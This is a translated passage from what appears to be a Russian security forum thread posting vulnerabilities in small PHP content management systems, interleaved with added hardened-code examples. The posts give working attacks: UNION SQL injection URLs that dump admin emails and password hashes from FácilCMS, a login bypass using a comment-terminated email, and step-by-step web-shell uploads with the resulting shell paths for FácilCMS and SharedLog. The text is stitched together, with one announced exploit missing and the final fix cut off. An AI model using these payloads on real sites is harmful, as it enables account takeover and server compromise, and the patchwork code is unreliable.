ANTICHAT: an information security, OSINT and technology forum
ANTICHAT is a Russian-speaking community for security, OSINT and programming.
14.06.2011, 03:15
Regular member | Registered: 24.06.2009 | Posts: 542 | Time on forum: 2101094 | Reputation: 672
WebsiteBaker CMS
Vulnerable module: Event_Calendar
SQL Injection
/modules/event_calendar/details_popup.php
PHP code:
$event_id = $_GET['entry_id'];
$sql = "SELECT id,start_time,end_time,short_description,long_description,link_text,link_http,type FROM " . TABLE_PREFIX . "mod_event_calendar WHERE id = $event_id;";
$query_entries = $database->query($sql);
$entry = $query_entries->fetchRow();
There's no point describing a dork or a shell-upload method, it's all elementary...
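A hardened version of the details_popup.php lookup, added here as an example and not WebsiteBaker's own code. It assumes PHP 7.1+, a PDO handle for the first variant, the $database->query()/fetchRow() wrapper names exactly as the post shows them for the second, and TABLE_PREFIX defined as a placeholder.

```php
<?php
// Added example, not WebsiteBaker's code. The details_popup.php lines in the post drop
// $_GET['entry_id'] into the SQL text unchecked; the column is a numeric key, so the fix
// is to accept only a decimal integer and then bind (or at least cast) it.

if (!defined('TABLE_PREFIX')) {
    define('TABLE_PREFIX', 'wb_');   // placeholder; the real prefix comes from WB's config
}

// Shared validation step: returns the id as int, or null for anything that is not a
// plain positive decimal (letters, spaces, quotes, a second statement, ...).
function eventIdFromRequest(array $get): ?int
{
    $raw = isset($get['entry_id']) ? (string)$get['entry_id'] : '';
    if ($raw === '' || !ctype_digit($raw)) {
        return null;
    }
    $id = (int)$raw;
    return $id > 0 ? $id : null;
}

// Variant 1: PDO prepared statement (assumes a PDO handle to the WB database).
function fetchEventPdo(PDO $pdo, array $get): ?array
{
    $id = eventIdFromRequest($get);
    if ($id === null) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT id,start_time,end_time,short_description,long_description,link_text,link_http,type'
        . ' FROM ' . TABLE_PREFIX . 'mod_event_calendar WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Variant 2: keep the page's $database wrapper (assumed to expose query()/fetchRow() as
// shown) and build the SQL only after the value has been reduced to an int.
function fetchEventWrapper($database, array $get)
{
    $id = eventIdFromRequest($get);
    if ($id === null) {
        return null;
    }
    $sql = 'SELECT id,start_time,end_time,short_description,long_description,link_text,link_http,type'
         . ' FROM ' . TABLE_PREFIX . 'mod_event_calendar WHERE id = ' . $id;
    $query_entries = $database->query($sql);
    return $query_entries ? $query_entries->fetchRow() : null;
}
```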
01.08.2011, 16:08
Guest | Posts: n/a | Time on forum: 4100 | Reputation: 74
FácilCMS
sourceforge.net/projects/facil-cms
1. SQL injection (pulling the admin account)
News.mysql.class.php
PHP code:
 wagner.santos@dotlinux.com.br
 * Celina Jorge -> celina.jorge@dotlinux.com.br
 *
 * ====================================================================
 * Facil-CMS is Free Software. You can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by
 * the Free Software Foundation (either version 2.0 of the license).
 * ====================================================================
 */
class News
{
    var $_ID        = false;
    var $_LANGUAGE  = null;
    var $_TITLE     = '';
    var $_RESUME    = '';
    var $_CONTENT   = '';
    var $_PUBLISHER = null;
    var $_DATE      = null;
    var $_STATUS    = '0';

    function __constructor($id = false)
    {
        if($id)
        {
            $this->getNewInfo($id);
        }
    }

    function News($id = false)
    {
        if($id)
        {
            $this->getNewInfo($id);
        }
    }

    function getId()
    {
        return $this->_ID;
    }

    function setId($id)
    {
        $this->_ID = $id;
    }

    function getLanguage()
    {
        return $this->_LANGUAGE;
    }

    function setLanguage($language)
    {
        $this->_LANGUAGE = $language;
    }

    function getTitle()
    {
        return $this->_TITLE;
    }

    function setTitle($title)
    {
        $this->_TITLE = $title;
    }

    function getResume()
    {
        return $this->_RESUME;
    }

    function setResume($resume)
    {
        $this->_RESUME = $resume;
    }

    function getContent()
    {
        return $this->_CONTENT;
    }

    function setContent($content)
    {
        $this->_CONTENT = $content;
    }

    function getPublisher()
    {
        return $this->_PUBLISHER;
    }

    function setPublisher($publisher)
    {
        $this->_PUBLISHER = $publisher;
    }

    function getDate()
    {
        return $this->_DATE;
    }

    function setDate($date)
    {
        $this->_DATE = $date;
    }

    function getStatus()
    {
        return $this->_STATUS;
    }

    function setStatus($status)
    {
        $this->_STATUS = $status;
    }

    // $id is concatenated into the query unquoted and unchecked.
    function getNewInfo($id)
    {
        $sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $id;
        $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . ' ' . $sql);
        if($res->RecordCount() == 1)
        {
            $this->setContent($res->fields('content'));
            $this->setDate($res->fields('date'));
            $this->setId($res->fields('id'));
            $this->setLanguage($res->fields('language'));
            $this->setPublisher($res->fields('publisher'));
            $this->setResume($res->fields('resume'));
            $this->setStatus($res->fields('status'));
            $this->setTitle($res->fields('title'));
            return true;
        }
    }

    function Add()
    {
        if(!$this->getId())
        {
            $sql = "INSERT INTO " . _NEWS_DB_TABLE_ . " (id, language, title, resume, content, publisher, date, status) VALUES (null, '" . $this->getLanguage() . "', '" . $this->getTitle() . "', '" . $this->getResume() . "', '" . $this->getContent() . "', " . $this->getPublisher() . ", NOW(), '" . $this->getStatus() . "')";
            if($GLOBALS['DB']->Execute($sql))
            {
                return true;
            }
            else
            {
                die($GLOBALS['DB']->ErrorMsg() . ' ' . $sql);
            }
        }
    }

    function Erase()
    {
        if($this->getId())
        {
            $sql = "DELETE FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $this->getId();
            if($GLOBALS['DB']->Execute($sql))
            {
                return true;
            }
            else
            {
                die($GLOBALS['DB']->ErrorMsg() . ' ' . $sql);
            }
        }
    }

    function Update()
    {
        if($this->getId())
        {
            $sql = "UPDATE " . _NEWS_DB_TABLE_ . " SET language='" . $this->getLanguage() . "', title='" . $this->getTitle() . "', resume='" . $this->getResume() . "', content='" . $this->getContent() . "', status='" . $this->getStatus() . "' WHERE id=" . $this->getId();
            if($GLOBALS['DB']->Execute($sql))
            {
                return true;
            }
            else
            {
                die($GLOBALS['DB']->ErrorMsg() . ' ' . $sql);
            }
        }
    }

    function countNews($language = false)
    {
        $sql = "SELECT COUNT(*) as Total FROM " . _NEWS_DB_TABLE_ . " WHERE status='1'";
        $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . ' ' . $sql);
        return $res->fields('Total');
    }

    function listNews($start = 0, $limit = 30, $language = false)
    {
        if($language)
        {
            $language = ' language="' . $language . '"';
        }
        else
        {
            $language = '';
        }
        if(!$_SESSION['UTYPE'] == '1')
        {
            $status = " status='1'";
        }
        else
        {
            $status = '';
        }
        if($language != '' || $status != '')
        {
            $where = ' WHERE';
            if($language != '')
            {
                $where .= $language;
            }
            if($status != '')
            {
                if($language != '')
                {
                    $where .= ' AND';
                }
                $where .= $status;
            }
        }
        $sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . $where . " ORDER BY date DESC LIMIT " . $start . ", " . $limit;
        $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . ' ' . $sql);
        if($res->RecordCount() > 0)
        {
            $array = array();
            while(!$res->EOF)
            {
                $utils = new facilUtils();
                $date = $utils->formatDate($res->fields('date'));
                $array[] = array('id' => $res->fields('id'), 'title' => $res->fields('title'), 'date' => $date);
                $res->MoveNext();
            }
            return $array;
        }
    }
}
?>
Code:
http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email,0x3a,password+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+
2. Another way into the admin panel, if bruteforcing the admin's hash (URL above) didn't work out.
login.php
PHP code:
 wagner.santos@dotlinux.com.br
 * Celina Jorge -> celina.jorge@dotlinux.com.br
 *
 * ====================================================================
 * Facil-CMS is Free Software. You can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by
 * the Free Software Foundation (either version 2.0 of the license).
 * ====================================================================
 */
session_start();
require_once('config.inc.php');
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
if($_POST['email'] && $_POST['password'])
{
    require_once(_FACIL_MODULES_PATH_ . '/Users/i18n/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
    require_once(_FACIL_MODULES_PATH_ . '/Users/config.php');
    require_once(_FACIL_MODULES_PATH_ . '/Users/class/index.php');
    // The e-mail goes to Users::Login() exactly as posted; only the password is hashed.
    $email    = $_POST['email'];
    $password = md5($_POST['password']);
    $user  = new Users();
    $login = $user->Login($email, $password);
    if($login && !is_null($login) && !empty($login))
    {
        $user = new Users($login);
        $_SESSION['UID']   = $user->getId();
        $_SESSION['UTYPE'] = $user->getType();
        $_SESSION['EMAIL'] = $user->getEmail();
        $_SESSION['NAME']  = $user->getName();
        header("location: modules.php?modload=Users");
    }
    else
    {
        $js = new jsAlert(_BAD_USER_OR_PASSWORD_, 'history.go(-1);');
        print $js->Alert();
    }
}
elseif($_GET['logoff'] == "1")
{
    foreach($_SESSION as $id => $value)
    {
        $_SESSION[$id] = false;
        unset($_SESSION[$id]);
        header("location: index.php");
    }
}
else
{
    header("location: index.php");
}
?>
This method only requires the admin's e-mail.
Code:
http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+
To log in as the admin you only need to enter the e-mail and any password, commenting out the rest of the line right after the e-mail, that is:
Code:
admin@facilcms.org--
or
Code:
admin@facilcms.org/*
3. Uploading
adminPhotos.php
PHP code:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
require_once('header.php');
$theme = new themeFacil();
print $theme->moduleTitle('Albums');
if($_POST['op'])
{
    $op = $_POST['op'];
}
elseif($_GET['op'])
{
    $op = $_GET['op'];
}
else
{
    $op = false;
}
switch($op)
{
    default:
        break;
    case "add":
        if($_POST['album'] && $_FILES)
        {
            $util = new facilUtils();
            $comment = $util->htmlentities($_POST['comment']);
            $photo = new Photos();
            $photo->setAlbum($_POST['album']);
            $photo->setComment($comment);
            $photo->setFile($_FILES['file']['name']);
            if($photo->Add())
            {
                $js = new jsAlert(_PHOTO_SUCCESSFULLY_UPLOADED_, "window.location='"._MODULE_URL_."&op=view&id=".$_POST['album']."';");
                print $js->Alert();
            }
            else
            {
                $js = new jsAlert(_ERROR_WHILE_UPLOADING_PHOTO_, 'history.go(-1);');
                print $js->Alert();
            }
        }
        break;
    case "edit":
        if($_POST['id'])
        {
            $id = $_POST['id'];
        }
        elseif($_GET['id'])
        {
            $id = $_GET['id'];
        }
        else
        {
            $id = false;
        }
        if($id)
        {
            $form = new formPhotos();
            print $form->Edit($id);
        }
        break;
    case "change":
        if($_POST['id'])
        {
            $util = new facilUtils();
            $comment = $util->htmlentities($_POST['comment']);
            $photo = new Photos($_POST['id']);
            $photo->setComment($comment);
            if($photo->Update())
            {
                $js = new jsAlert(_PHOTO_SUCCESSFULLY_CHANGED_, "window.location='"._MODULE_URL_."&op=photo&id=".$_POST['id']."';");
                print $js->Alert();
            }
            else
            {
                $js = new jsAlert(_ERROR_WHILE_UPDATING_PHOTO_, 'history.go(-1);');
                print $js->Alert();
            }
        }
        break;
    case "erase":
        if($_GET['id'])
        {
            $photo = new Photos($_GET['id']);
            if($photo->getId())
            {
                if($photo->Erase())
                {
                    $js = new jsAlert(_PHOTO_SUCCESSFULLY_ERASED_, "window.location='"._MODULE_URL_."&op=view&id=".$photo->getAlbum()."';");
                    print $js->Alert();
                }
                else
                {
                    $js = new jsAlert(_ERROR_WHILE_ERASING_PHOTO_, 'history.go(-1);');
                    print $js->Alert();
                }
            }
        }
        break;
}
require_once('footer.php');
?>
We upload the shell "as is" through the pictures in the albums menu:
Code:
http://temp/modules/Albums/albums/1/file/shell.php
4. XSS
XSS is all over the place there (reflected): the login form, search, etc.
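The "add" branch above hands the client-supplied $_FILES['file']['name'] straight to setFile(), which is why a .php file ends up under the album directory; the SharedLog uploader later in this thread has the same shape (move_uploaded_file with the original name). As an added example that is not FácilCMS code, this is the same step with the bytes validated and the name chosen by the server; the function name albumStoreUpload, the ALBUM_DIR constant and the 5 MB limit are assumptions.

```php
<?php
// Added example (not FácilCMS code): hardened replacement for the
// "store $_FILES['file']['name'] as-is" pattern of the Albums module.
// Function and constant names are hypothetical.

declare(strict_types=1);

/**
 * Validate an uploaded image and store it under a server-chosen name.
 *
 * @param array  $file    one entry of $_FILES (e.g. $_FILES['file'])
 * @param string $destDir directory where images of this album are kept
 * @return string         the stored file name (never the client's name)
 * @throws RuntimeException on any validation failure
 */
function albumStoreUpload(array $file, string $destDir): string
{
    // 1. Accept only a genuine upload; $file['name'] is attacker-controlled
    //    and is never used to build a path.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    if ($file['size'] > 5 * 1024 * 1024) {   // assumed limit
        throw new RuntimeException('upload too large');
    }

    // 2. Decide the type from the bytes, not from the client's 'type'
    //    field or from the extension of the original name.
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('unsupported type');
    }
    // getimagesize() must agree that the file parses as that image type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || image_type_to_mime_type($info[2]) !== $mime) {
        throw new RuntimeException('file is not a well-formed image');
    }

    // 3. Server-generated name with a fixed, non-executable extension;
    //    the original name may be kept as metadata only (escaped on output).
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644); // readable, never executable

    return $name;
}

// Usage inside the "add" branch (replacing setFile($_FILES['file']['name'])).
// ALBUM_DIR is assumed; the album id is cast so it cannot carry path parts.
//   $stored = albumStoreUpload($_FILES['file'], ALBUM_DIR . '/' . (int)$_POST['album']);
//   $photo->setFile($stored);
```

Independently of the check, the album directory should be served with script execution off (for mod_php, "php_admin_flag engine off" in the vhost), so that a file that does slip through is returned as data rather than run.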
03.08.2011, 01:15
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74
ljfCMS blind sql-inj [POST method]
made in china
login.php
PHP code:
"login_sucess","Action"=>"{$_POST[AName]}"));
        alert("login sucess","location","index.php");
    }
    else
    {
        new ActionLog(array("LogType"=>"login_err","Action"=>"{$_POST[AName]},{$_POST[APwd]}"));
        alert("�û���������","location","login.php");
    }
}
if($_GET['action'] == 'logout')
{
    $_SESSION['AID'] = '';
    session_destroy();
}
?>
if(location.href != top.location.href)top.location.href=location.href;
�û���
����
Admin.php
PHP code:
AID))
    {
        $sql = "select * from Admin where PID={$this->AID}";
        $result = mysql_query($sql, $conn);
        while($row = mysql_fetch_array($result))
        {
            $arr[] = new Admin($row);
        }
    }
    return $arr;
}
function parent()
{
    global $conn;
    $admin = NULL;
    if($this->PID == 0)
        return $admin;
    $sql = "select * from Admin where AID={$this->PID}";
    $result = mysql_query($sql);
    if($row = mysql_fetch_array($result))
    {
        $admin = new admin($row);
    }
    return $admin;
}
function CPower()
{
    return unserialize($this->CPower);
}
function login($postdata)
{
    extract($postdata);
    global $conn;
    if($AName == '' || $APwd == '')
        alert("�û������벻Ϊ��");
    $sql = "select * from Admin where AName='$AName'";
    $result = mysql_query($sql);
    if($row = mysql_fetch_array($result))
    {
        if($row['APwd'] == md5($APwd))
        {
            $_SESSION['AID'] = $row['AID'];
            $_SESSION['AName'] = $row['AName'];
            $_SESSION['Power'] = $row['Power'];
            $_SESSION['CPower'] = $row['CPower'];
            return true;
        }
    }
    return false;
}
function delete()
{
    global $conn;
    $sql = "delete * from Admin where AID={$this->AID}";
    mysql_query($sql);
    $children = $this->children();
    if($children)
    {
        foreach($children as $child)
            $child->delete();
    }
    return true;
}
}
/*
CREATE TABLE `Admin` (
  `AID` int(10) unsigned NOT NULL auto_increment,
  `AName` varchar(255) NOT NULL,
  `APwd` varchar(255) NOT NULL,
  `PID` int(10) unsigned NOT NULL,
  `AddDate` int(11) NOT NULL default '0',
  `Power` int(11) NOT NULL default '0',
  `CPower` text NOT NULL,
  PRIMARY KEY (`AID`),
  UNIQUE KEY `AName` (`AName`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1
*/
?>
And the exploit itself, thrown together "in a hurry":
PHP code:
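The login() method above builds its SELECT by interpolating $AName into the string, which is the blind injection the post is about, and extract($postdata) lets a client overwrite any local variable by posting its name. Added example, not ljfCMS code: the same routine with the name passed as a bound parameter and the fields read explicitly; the function name adminLogin, the PDO handle and the assumption that the APwd column has been migrated from md5() to password_hash() are mine.

```php
<?php
// Added example (not ljfCMS code): Admin::login() rewritten so that the
// user-supplied AName never becomes part of the SQL text. Assumes the
// APwd column has been migrated from md5() hashes to password_hash().

declare(strict_types=1);

/**
 * Authenticate an admin and fill the session the way Admin::login() does.
 *
 * @param PDO   $db   connection opened with ERRMODE_EXCEPTION and
 *                    ATTR_EMULATE_PREPARES = false
 * @param array $post the raw $_POST array (no extract() on it)
 * @return bool       true on success; the caller logs/redirects on false
 */
function adminLogin(PDO $db, array $post): bool
{
    // Read exactly the two fields we need. extract($postdata) would let a
    // client overwrite $sql, $conn or anything else by posting that name.
    $name = (string)($post['AName'] ?? '');
    $pwd  = (string)($post['APwd'] ?? '');
    if ($name === '' || $pwd === '') {
        return false;
    }

    // Bound parameter: quotes, comments or boolean conditions inside $name
    // are data to the server, not query syntax. Only the columns the session
    // needs are selected.
    $stmt = $db->prepare(
        'SELECT AID, AName, APwd, Power, CPower FROM Admin WHERE AName = :name'
    );
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash when the name is unknown, so the response
    // time does not tell unknown names from wrong passwords (the original
    // returned early on an unknown name).
    $storedHash = $row['APwd'] ?? password_hash('dummy-placeholder', PASSWORD_DEFAULT);
    if ($row === false || !password_verify($pwd, $storedHash)) {
        return false;
    }

    // Same session layout as the original so the rest of the CMS keeps
    // working; a fresh session id prevents fixation across the login.
    session_regenerate_id(true);
    $_SESSION['AID']    = $row['AID'];
    $_SESSION['AName']  = $row['AName'];
    $_SESSION['Power']  = $row['Power'];
    $_SESSION['CPower'] = $row['CPower'];
    return true;
}

// Constructed wiring for login.php (DSN and credentials are placeholders):
//   $db = new PDO('mysql:host=localhost;dbname=ljfcms;charset=utf8mb4', $dbUser, $dbPass, [
//       PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//       PDO::ATTR_EMULATE_PREPARES => false,
//   ]);
//   if (adminLogin($db, $_POST)) { /* log login_sucess, go to index.php */ }
//   else                         { /* log login_err, back to login.php   */ }
```

Note that the original's ActionLog line writes the posted password into the log on failure; whichever logging is kept, it should record the name only.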
03.08.2011, 20:31
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74
SharedLog Alpha 1.0
To hell with the SQLi and XSS, we upload right away!
slideshow_uploadaudio.content.php
PHP code:
....
sess();
$_SESSION['lang'] = @$_SESSION['lang']=='' ? 'en' : $_SESSION['lang']; //
$hdlTranslation->setLang($_SESSION['lang']);
if ( isSet($_SERVER['REQUEST_METHOD']) ) {
    //
    if (strToUpper($_SERVER['REQUEST_METHOD'])=='POST') {
        $H = $_POST;
    }else if (strToUpper($_SERVER['REQUEST_METHOD'])=='GET') {
        $H = $_GET;
    }else {
        $H = ( isSet($_GET['a']) ? $_GET : (isSet($_POST['a']) ? $_POST : array() ) ) ;
    }
}
$a = (isSet($_GET['a']) ? $_GET['a'] : ' ') ;
$a = ($a==' ' && isSet($_POST['a']) ? $_POST['a'] : $a) ;
$a = strToLower($a) ;
$H['lang'] = ( @$H['lang']!='' ? $H['lang'] : 'en') ;
set_cookie_reffered('ev_ref_id','ev_http','ev_date'); // from lib.sys
// Prevent not logged in user from accessing the pages for only logged in users.
// now must use session to store userID and maybe sid also. Sid is tied to user password
// it's at least a substring of md5($password)
// it will be more secure to use both uid and sid, but not necessary.
if ( empty($_SESSION['user']['user_idnr']) )
{
    if ( !isset($NOT_LOGINED_USER[$a]) )
    {
        redirect('/'.MAIN_FILE.'?a=login&not-logined&from='.urlEncode($H['a']) );
    }
}
else
{
    $arrUser = $_SESSION['user'];
}
if (!isset($hdlGlobal)) {
    $hdlGlobal = new clsGlobal($objLogger, $hdlDb, $hdlCache, $hdlTpl, $hdlTranslation, $arrUser, $arrSettings, $arrResourceType);
}
define('DIR_AUDIO', "/monster/Content/resources/audiofiles/");
#define('DIR_AUDIO', "/usr/local/apache/sites/dcomments.com/htdocs/video_streaming/prototype/resources/audiofiles/");//Temporary location
//this is used when audio file uploaded and inserted it will automatically get selected in dropdown
$intAudioClipId = 0;
/*Language translation class for multilingual setup start*/
$H['lang'] = ( @$H['lang']!='' ? $H['lang'] : 'en') ;
#--------------------------------------------------------------------------
# TRANSLATION
#--------------------------------------------------------------------------
$GLOBALS['PARAMS']['strings_tables'] = $hdlCache->fnGetValues('arrLangs');
//$TR2 =& Translation2::factory($GLOBALS['tr2_driver'], $GLOBALS['DBINFO'], $GLOBALS['PARAMS'] ) ;
$_SESSION['lang'] = @$_SESSION['lang']=='' ? 'en' : $_SESSION['lang'] ;
$hdlTranslation->setLang($_SESSION['lang'] );
#--------------------------------------------------------------------------
/*Language translation class for multilingual setup end*/
$arrLangVars = $hdlTranslation->getPage("create_slide_show");
if(intval($_GET['imageid'])!=0)
{
    $imageid = $_GET['imageid'];
}
else
{
    $imageid = $_POST['tempimageid'];
}
/*Handling file upload start*/
if(isset($_POST['btnupload']))
{
    $userid = $hdlGlobal->arrUser['user_idnr'];
    if($_FILES['audiofile']['tmp_name'])
    {
        $flag = false; // flag variable used to check if there was any error while image upload, Aysha 9 Apr 2007
        $strUploadPath = DIR_AUDIO."/".str_replace(" ","_",$_FILES['audiofile']['name']);
        $hdlUploadFile = new clsUploadAVFiles();
        if(!$hdlUploadFile->fnIsVirusInFile($_FILES['audiofile']['tmp_name']))
        {
            $strResult = "Error uploading File, File contains virus!";
            return $strResult;
        }
        //echo $strDestinationLocation;
        if(move_uploaded_file($_FILES['audiofile']['tmp_name'], $strUploadPath))
        {
            $strType = $_FILES['audiofile']['type'];
            $sqlResource = "INSERT INTO `RESOURCE` SET `userinfo_id`=".$userid." , `resource_type_id`=3 , `description`='Auto created by Uploader' , `added_time`='".date("Y-m-d H:i:s")."', `upload_method_id`='www' , `img_type`='".$strType."' , `orig_name`='".$_FILES['audiofile']['name']."' , `deleted`='0' , `featured`='N' , `nntp_messages_id`='0'";
            $hdlDb->fnInsertUpdate($sqlResource, BR.__FILE__.BR.' in '.__FUNCTION__.'(); 20050705_032027 ') ;
            $intResourceId = $hdlDb->fnLastInsertId('RESOURCE');
            $strDestinationLocation = $hdlUploadFile->fnPreparePath($intResourceId, DIR_AUDIO, $strType, "", "audio");
            //**********Prepare location for audio file
            /*echo $strUploadPath." ";
            echo DIR_AUDIO."/".$strDestinationLocation;*/
            copy($strUploadPath, DIR_AUDIO."/".$strDestinationLocation);
            //**************Update avatar field in db
            $sqlAudioFiles = "INSERT INTO AUDIO_FILES VALUES('','".$userid."','".$_FILES['audiofile']['name']."','','".$intResourceId."',UNIX_TIMESTAMP( ),'N')";
            $hdlDb->fnInsertUpdate($sqlAudioFiles, BR.__FILE__.BR.' in '.__FUNCTION__.'(); 20050705_032027 ') ;
            $intAudioClipId = $hdlDb->fnLastInsertId('AUDIO_FILES');
            unlink($strUploadPath);
            $strResult = "File uploaded successfully!";
        }
        else
        {
            $strResult = "Image Uploading failed";
        }
    }
}
/*
function #-------------------{ fnGetPageSlideShows }-------------------()
{} */
# +-----------------------------------------------------------------------+
# | Description: Handling file upload end
# | Params: $intAudioClipId - Integer audio clip id
# +-----------------------------------------------------------------------+
function fnGetHTMLSelectBoxAudioList($arrUser)
{
    $html = ''.
        'Select Audio';
    $html .= fnBuildAudioDropdownDynamicOptions($arrUser);
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]fnBuildAudioDropdownDynamicOptions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/*Feching preloaded Audio files*/
// Temporary static files given
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'----Preloaded Audio Clips----'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 1'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 2'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 3'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 4'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/*Fetching user's uploaded audio files*/
[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT id,file_name,resource_id FROM AUDIO_FILES WHERE user_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnFetchQueryResult[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;
if([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"])>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"----Your Audio Clips----"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$selected[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
foreach ([/COLOR][COLOR="#0000BB"]$arrResAudioFiles[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$arrRow[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arrRow[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
}
}
return[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"];
}
}
....
[/COLOR][/COLOR]
Usage:
-> Register a user
-> In the media menu, upload the shell "as is".
-> The naming scheme for uploaded files is as follows:
PHP code:
$ShellName = md5($_FILES['name']) . "_" . $_FILES['name'];
-> That is, an uploaded shell.php will be named (and located at):
Code:
site.com/resources/audiodir/25a452927110e39a345a2511c57647f2_shell.php
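Added example, not FácilCMS code and not from the post above: what the audio upload handler looks like when the file type is decided from the bytes on disk, the stored name is random with an allow-listed extension, and the INSERT is parameterized. Assumptions (all hypothetical): $pdo is a PDO connection, $userid is the authenticated user's id, $uploadDir is a directory from which the web server never executes PHP (ideally outside the document root), and AUDIO_FILES has columns user_id, file_name, stored_name, created and approved.

```php
<?php
// Added example, not FácilCMS code. Assumptions: $pdo is a PDO connection, $userid is the
// authenticated user's id, $uploadDir is never served as executable PHP, and the
// AUDIO_FILES column names below are hypothetical.

declare(strict_types=1);

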